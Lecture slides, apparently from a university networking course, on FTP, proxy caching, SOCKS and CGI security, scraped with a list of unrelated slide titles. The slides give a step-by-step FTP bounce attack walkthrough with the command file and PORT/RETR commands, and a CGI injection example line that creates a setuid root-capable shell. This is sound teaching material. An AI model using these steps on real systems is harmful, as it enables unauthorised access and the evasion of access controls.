TELE 301 Lecture 17: FTP … 1 Overview Last Lecture –Remote Terminal Services (SSH) This Lecture –File transfer and web caching Next Lecture –Directory.

Slides:



Advertisements
Similar presentations
Transfer Content to a Website What is FTP? File Transfer Protocol FTP is a protocol – a set of rules Designed to allow files to be transferred across.
Advertisements

Enabling Secure Internet Access with ISA Server
Working with Proxy Servers and Application-Level Firewalls Chapter 5.
COS 420 DAY 25. Agenda Assignment 5 posted Chap Due May 4 Final exam will be take home and handed out May 4 and Due May 10 Latest version of Protocol.
Telnet/SSH Tim Jansen, Mike Stanislawski. TELNET is short for Terminal Network Enables the establishment of a connection to a remote system, so that the.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
File Transfer Protocol (FTP)
1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.
Introduction 1 Lecture 7 Application Layer (FTP, ) slides are modified from J. Kurose & K. Ross University of Nevada – Reno Computer Science & Engineering.
John Degenhart Joseph Allen.  What is FTP?  Communication over Control connection  Communication over Data Connection  File Type  Data Structure.
1 Enabling Secure Internet Access with ISA Server.
FIREWALL TECHNOLOGIES Tahani al jehani. Firewall benefits  A firewall functions as a choke point – all traffic in and out must pass through this single.
Telnet/SSH: Connecting to Hosts Internet Technology1.
FTP File Transfer Protocol. Introduction transfer file to/from remote host client/server model  client: side that initiates transfer (either to/from.
2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.
2: Application Layer1 Chapter 2 Application Layer These slides derived from Computer Networking: A Top Down Approach, 6 th edition. Jim Kurose, Keith Ross.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.
Configuring a Web Server. Overview Overview of IIS Preparing for an IIS Installation Installing IIS Configuring a Web Site Administering IIS Troubleshooting.
Ferry Astika Saputra FTP & TFTP Server. Overview File Transfer Protocol (RFC 959) Why FTP? FTP’s connections FTP in action FTP commands/responses Trivial.
1 Web Server Administration Chapter 9 Extending the Web Environment.
January 2009Prof. Reuven Aviv: Firewalls1 Firewalls.
Network Protocols. Why Protocols?  Rules and procedures to govern communication Some for transferring data Some for transferring data Some for route.
FTP (File Transfer Protocol) & Telnet
ES Module 5 Uniform Resource Locators, Hypertext Transfer Protocol, & Common Gateway Interface.
Rensselaer Polytechnic Institute Shivkumar Kalvanaraman, Biplab Sikdar 1 The Web: the http protocol http: hypertext transfer protocol Web’s application.
Csci5233 Computer Security1 Bishop: Chapter 27 System Security.
Implementing ISA Server Publishing. Introduction What Are Web Publishing Rules? ISA Server uses Web publishing rules to make Web sites on protected networks.
1 Chapter 6: Proxy Server in Internet and Intranet Designs Designs That Include Proxy Server Essential Proxy Server Design Concepts Data Protection in.
Firewall and Internet Access Mechanism that control (1)Internet access, (2)Handle the problem of screening a particular network or an organization from.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 Application Layer Functionality and Protocols.
1 Apache. 2 Module - Apache ♦ Overview This module focuses on configuring and customizing Apache web server. Apache is a commonly used Hypertext Transfer.
Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.
FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.
AE6382 Secure Shell Usually referred to as ssh, the name refers to both a program and a protocol. The program ssh is one of the most useful networking.
Hour 7 The Application Layer 1. What Is the Application Layer? The Application layer is the top layer in TCP/IP's protocol suite Some of the components.
User Access to Router Securing Access.
Fundamentals of Proxying. Proxy Server Fundamentals  Proxy simply means acting on someone other’s behalf  A Proxy acts on behalf of the client or user.
Application Services COM211 Communications and Networks CDA College Theodoros Christophides
Data Communications and Computer Networks Chapter 2 CS 3830 Lecture 8 Omar Meqdadi Department of Computer Science and Software Engineering University of.
Computer Networking From LANs to WANs: Hardware, Software, and Security Chapter 13 FTP and Telnet.
G CITRIXHACKIN. Citrix Presentation Server 4.5 New version is called XenApp/Server Common Deployments Nfuse classic CSG – Citrix Secure Gateway Citrix.
TFTP: Trivial file transfer protocol
FTP File Transfer Protocol Graeme Strachan. Agenda  An Overview  A Demonstration  An Activity.
1 WWW. 2 World Wide Web Major application protocol used on the Internet Simple interface Two concepts –Point –Click.
ITGS Network Architecture. ITGS Network architecture –The way computers are logically organized on a network, and the role each takes. Client/server network.
File Transfer Protocol (FTP) FTP host stores files Client logs into host Client program sends command to get a file FTP host downloads the file with error.
1 Chapter Overview Creating Web Sites and FTP Sites Creating Virtual Directories Managing Site Security Troubleshooting IIS.
Remote Access Usages. Remote Desktop Remote desktop technology makes it possible to view another computer's desktop on your computer. This means you can.
1 FTP: File Transfer Protocol EE 122: Intro to Communication Networks Fall 2006 Vern Paxson TAs: Dilip Antony Joseph and Sukun Kim
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.
Application Layer instructors at St. Clair College in Windsor, Ontario for their slides. Special thanks to instructors at St. Clair College in Windsor,
Lecture 9 Page 1 CS 236 Online Firewalls What is a firewall? A machine to protect a network from malicious external attacks Typically a machine that sits.
Web and Proxy Server.
Secure services Unit-IV CHAP-1
NAT、DHCP、Firewall、FTP、Proxy
Lecture 5 Blocking practices
Web Development Web Servers.
Securing the Network Perimeter with ISA 2004
Module 23 (ftp and wireshark)
Networking Applications
FTP & TFTP Server Ferry Astika Saputra.
Telnet/SSH Connecting to Hosts Internet Technology.
Topic 5: Communication and the Internet
الخطوات المطلوب القيام بها قبل انشاء الموقع
IS 4506 Server Configuration (HTTP Server)
Configuring Internet-related services
File Transfer Protocol
Presentation transcript:

TELE 301 Lecture 17: FTP … 1 Overview Last Lecture –Remote Terminal Services (SSH) This Lecture –File transfer and web caching Next Lecture –Directory services

TELE 301 Lecture 17: FTP … 2 FTP Basics Clear-text protocol. Woefully insecure. Largely due to its dual-channel nature. Can be used in bounce attack (don’t trust traffic from your FTP server) Use sftp or scp mechanisms instead for user-based access.

TELE 301 Lecture 17: FTP … 3 How FTP works? control data client server Command: PORT IP_ADDR PORT_NUM can ask the FTP server to connect any machine and port

TELE 301 Lecture 17: FTP … 4 Anonymous FTP Incoming directory Default guest “password” ( addr.) Download Accelerators Run as standalone or inetd Use HTTP instead

TELE 301 Lecture 17: FTP … 5 FTP bounce attack Scenario –You are a user on foreign.fr, IP address x.x.x.x, and want to retrieve cryptographic source code from crypto.com in the US. –The FTP server at crypto.com is set up to allow your connection, but deny access to the crypto sources because your source IP address is that of a non-US site –However, crypto.com will allow ufred.edu to download crypto sources because ufred.edu is in the US too. –ufred.edu offers anonymous FTP and has a world- writable /incoming directory for anonymous users to drop files into. –Crypto.com's IP address is z.z.z.z.

TELE 301 Lecture 17: FTP … 6 FTP bounce attack (cont.) Data connection Control connection control data Foreign.fr Crypto.com Ufred.edu PORT x.x.x.x, yy yy     

TELE 301 Lecture 17: FTP … 7 Assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine's real IP address [not localhost] and log in. Change to a convenient directory that you have write access to, and then do: –quote "pasv" –quote "stor foobar” Take note of the address and port that are returned from the PASV command, x.x.x.x, yy. This FTP session will now hang, so background it or flip to another window or something to proceed with the following.

TELE 301 Lecture 17: FTP … 8 Construct a file containing FTP server commands. Let's call this file "instrs". It will look like this: –user ftp –pass –cwd /export-restricted-crypto –type i –port x,x,x,x,y,y –retr crypto.tar.Z –quit x,x,x,x,y,y is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data. The reason for this filler is to keep the control TCP connection longer enough to ensure the data transfer to finish.

TELE 301 Lecture 17: FTP … 9 Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands: –put instrs –quote "port C,C,C,C,0,21" –quote "retr instrs” –Note C.C.C.C is the IP address of crypto.com Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP connection.

TELE 301 Lecture 17: FTP … 10 Proxy Cache Save Bandwidth/Money Increase Performance – for static pages, multiple clients. Most useful for images and other objects. Client configured to send HTTP request via cache server. FTP is handled also. Can be auto-configured. (WPAD)

TELE 301 Lecture 17: FTP … 11 HTTP CONNECT Method Used for relaying (can’t cache) encrypted SSL connections. Cache just passes the connection through. CONNECT fnc.asbbank.co.nz:443 HTTP/1.1 Other users: AIM, PuTTY, Corkscrew... This can be used to circumvent access control, esp if the proxy cache is trusted!

TELE 301 Lecture 17: FTP … 12 Cache Hierarchies Parent proxies are commonly used, and are very useful when you can tap into a large proxy. Internet Cache Protocol ICP (UDP, Multicast) can be used to query sibling cache proxies.

TELE 301 Lecture 17: FTP … 13 Non-Caching Proxies Some proxies provide other features, such as Parental control HTML rewriting Security testing

TELE 301 Lecture 17: FTP … 14 Access Control You really must restrict access to known clients only. User-based authentication Don’t use the same password for Proxy as you do for system login (HTTP Basic Auth only.) Enforce use of Proxy Cache for authentication. (firewall)

TELE 301 Lecture 17: FTP … 15 Transparent Proxies No client configuration, traffic savings. Attractive to ISPs. Limitations Cannot use password authentication. HTTP 1.1 – proxy needs to find out what to connect to. Source address will be that of the proxy cache. X-Forwarded-For header (usually not logged)

TELE 301 Lecture 17: FTP … 16 Transparent Proxies Router / Firewall sits in the path of traffic. Redirects TCP/80 connections to the proxy server. Proxy server accepts the request, and using the Host header, finds out whether or not it can satisfy the request from cache or whether it needs to go to the server and get the page. In smaller setups, proxy and router are on same machine.

TELE 301 Lecture 17: FTP … 17 Reverse Proxies aka HTTP Accelerators Uses a Transparent Proxy in front of a dynamic web server. Essentially a transparent proxy that accepts GET and POST requests from everyone, and only to a few machines. Most useful when you have a lot of generated documents that will be the same.

TELE 301 Lecture 17: FTP … 18 SOCKS Proxies Similar to the CONNECT method, but designed primarily for security, not caching. Not just for web access, but for any TCP application. Is a form of a firewall. Each client application needs support, or have it wrapped in a replaced library.

TELE 301 Lecture 17: FTP … 19 Why CGI not secure? CGI (Common Gateway Interface) used to be work with web servers –But it may cause security holes Script command –`cp /bin/sh /tmp; chmod 4777 /tmp/sh` If the command is executed by a CGI script, the consequence is obvious. But how could that happen?

TELE 301 Lecture 17: FTP … 20 Resources Hacking Linux Exposed (2nd Edition) Brian Hatch & James Lee, ISBN Various useful documents Transparent Proxy HOWTO

TELE 301 Lecture 17: FTP … 21 Resources RFC2617 – HTTP Authentication: Basic and Digest... OWASP – The Open Web Application Security Project SANS Reading Room

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.